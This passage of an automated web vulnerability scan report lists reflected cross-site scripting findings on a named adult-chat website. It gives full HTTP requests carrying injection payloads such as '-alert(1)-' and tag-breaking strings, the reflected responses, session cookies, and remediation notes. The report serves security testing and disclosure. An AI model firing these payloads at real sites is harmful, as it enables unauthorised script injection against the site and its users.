User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:27 GMT
Connection: close
Content-Length: 25109
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:02 GMT
Connection: close
Content-Length: 24983
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:12 GMT
Connection: close
Content-Length: 73010
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 73157
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 52326
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 52111
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:49 GMT
Connection: close
Content-Length: 34182
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1">
...[SNIP]...

2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:59 GMT
Connection: close
Content-Length: 34366
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
